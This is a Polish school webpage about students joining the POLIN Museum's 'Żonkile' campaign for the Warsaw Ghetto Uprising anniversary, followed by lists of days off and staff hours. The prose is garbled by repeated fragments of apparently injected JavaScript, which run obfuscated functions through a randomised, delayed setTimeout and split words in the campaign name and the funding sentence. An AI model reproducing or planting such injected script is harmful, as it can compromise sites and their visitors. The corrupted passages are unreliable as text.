Akcja społeczno – edukacyjna „Żonkile”

W 72 rocznicę Powstania w Getcie Warszawskim, Muzeum POLIN zorganizowało akcję społeczno-edukacyjną „dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}Żdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}onkiledom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}”. Do akcji przyłączyli się uczniowie naszej szkoły. Koordynatorem działań była nauczycielka historii Katarzyna Dyja.

W związku akcją uczniowie wykonali papierowe żonkile – symbol pamięci o bohaterach powstania z 19 kwietnia 1943 roku. Przeprowadzono lekcję historii „Dymy nad gettem” – Polacy wobec walki Żydów w getcie warszawskim. Stworzono gazetkę tematyczną. W ramach konkursu szkolnego uczniowie wykonali prezentacje multimedialne pt. „Powstanie w Getcie Warszawskim”.

Realizacja projektu miała miejsce dzięki wsparciu udzielonemu z funduszy norweskich i EOG przez Isldom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andię, Liechtenstein i Norwegię.

Dni wolne

2 listopada 2017
3 listopada 2017
21 grudnia 2017
22 grudnia 2017
30 kwietnia 2018
2 maja 2018
4 maja 2018
1 czerwca 2018

Biblioteka szkolna

Poniedziałek 13.15 – 14.15
Środa 12.45 – 13.45

Psycholog

Środa 7.30 – 10.30

Logopeda

Wtorek 7.30 – 8.00
13.30 – 14.30
Środa 13.00 – 13.30